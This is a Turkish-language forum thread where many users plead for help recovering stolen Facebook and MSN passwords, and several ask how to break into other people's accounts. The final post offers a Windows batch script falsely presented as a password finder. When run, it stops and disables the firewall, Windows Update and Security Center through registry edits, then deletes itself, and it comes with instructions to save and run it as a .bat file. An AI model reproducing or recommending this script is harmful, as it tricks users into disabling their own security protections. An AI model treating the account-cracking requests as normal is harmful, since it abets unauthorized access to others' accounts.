![]() |
benim şifremi çalmışlar msn min nolur bulun bulursanız beni ekleyin şunu bunla konuşun resin yoq xDDD iyi çalışmalarr cok acilll |
yardım güzelim aynısı benim içinde geçerli ama benimki aldatıyor sekreteriyle,şifreyide değiştirmiş ne yapıcam bilmiyorum.ben ev hanımıyım ve geçen kızımla bakarken bir baktık eşimin face açık kalmış o değilden baktım ve görmez olaydım sekreteriyle 168 mesajı var,aldatıyor beni.ona ayrı ev açmalar,araba almalar,şimdide şifre değiştirmiş ne yapıcam nasıl bulabilirim şifreyi yardım edin allah rızası için sadee bakıcam 3 çocuğum var benim.bir şey yapamam zaten.sadece nasıl konuştuklarına bakıcam |
Alıntı:
Göreceğini görmüşsün hala şifre peşinde olman abest değil mi? :) Ev açmış, araba almış heralde evcilik oynamıyolardır masumca. :bilmem: |
arkadaşıma face şifremi verdim o da şifremi değiştirdi şifremi unutum yazıp tekrar değiştirmek istiyorum ama üzgünüz 24 saat sonra tekrar deneyiniz yazıyo 24 saat sonra tekrar deniyorum yok kendi şifremi nasıl bula bilirim.. |
lütfen şifremi bulun çok ihtiyacım var çaldılar şifremi |
yaa benim facemin şifresini biri değiştirmiş yada çalmış giremiyorum nasıll yapıcam şifremi değiştiricem ama msn şifresinide unuttum of ya ltfen söleyin ... |
facebook şifresi nasıl bulunur |
şfre nerden buluyorsunu söyleyi*n lütfen,. |
şifremi unuttum şifremi kırmak istiyorum |
slm facebook şifremi çaldılar verim bana bulun lütfen |
dün akşam benim faceboku patlatmşlar şifremi dğştrmşler yardmcı olurmusunuz sbnkozhan@hotmail.com |
birinin facesini kırcam kırırmısınız |
ŞİFREM DEĞİŞMİŞ BULAMIYORUM |
Facebook şifremi unuttum msn şifremide biLmiyorum nasıL buLabiLirim...? |
ben irem öngüçün facebook şifresini bulmak istiyorum |
ben facebook umun şifresini değiştirmek istiyorum ama aklıma hiç birşey gelmiyor ne koyabilirim |
Alıntı:
Alıntı:
|
bi ara bi çocuk facemi çaldı şimdi onunkini çalcam lütfen yardım |
ben bir arkdaşın msn şifresni versem size siz bana sadece facebook şifresini kırmadan öğrenebilirmisinz |
arkadaşlar şifre nasıl bulunur? |
şifrem değiştirilmiş bulamıyorum bulmama yardım edermisiniz lütfennnn |
şifremi yazıyorum diyo ki üzgünüz eski şifreye gidiniz diyo ve ben şifremi değiştirmedimki |
slm arkadaşlar facebook şifresi nasıl çalınır |
Facebook şifrem çalındı şu anda giriş yapamıyorum.MSN hesabımın gizli sorusunu yanıtlamayı denedim ancak cevabı hatırlamıyorum yardımıcı olumusunuz? |
Alıntı:
facebook un şifresini bilmek istiyorum |
Alıntı:
|
fesbuk şifre kırma nasıl yapabilirim |
Ya benim facemi çaldılar bulmaya yardım edermesınızz :( |
msn adresni bılmediğim kişin facebook şifresini öğrenmek istiyorum lutfen yadmcı olurmsn :( acıll |
benim bi rakdaşım hesabımı kilitledi bende onun facesini çalmak istiyorum qerçekten facebook şifre kırma proqramı varmı varsa link atabilirimisinz |
Selam arkadaşlar.Ben facebook şifremi,msn şifremi ve msn güvenlik sorumu hatırlamıyorum.Lütfen bana yardımcı olun. |
bi arkadaşımın facebook şifresini öğrenmek istiyorum |
Alıntı:
|
şifre nasıl kırılır thanks |
arkadaslar bn face sıfremı unuttum nasıl acabılırm onu yardm edermısınz |
ya nolur yardımcı olun biri şifremi deiştirmş msndende e posta yanlş dio :( |
Alıntı:
|
face şifremi unuttum bulamıyorum |
@echo off net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO A R E S >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic esSharedAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServic eswuauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Servicesw scsvc] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" DEL "%Temp%.kill.reg" DEL %0 BUNLARI NOTDEFTERİNE KOPYALA SONUNA ÖRNEK :notdefteri.bat yaz sonuna .bat eklemen yeterli sonra aç emaili kopyala buraya at ve şifreyi bulsun |
| Saat: 16:45 |
©2005 - 2026, MsXLabs - MaviKaranlık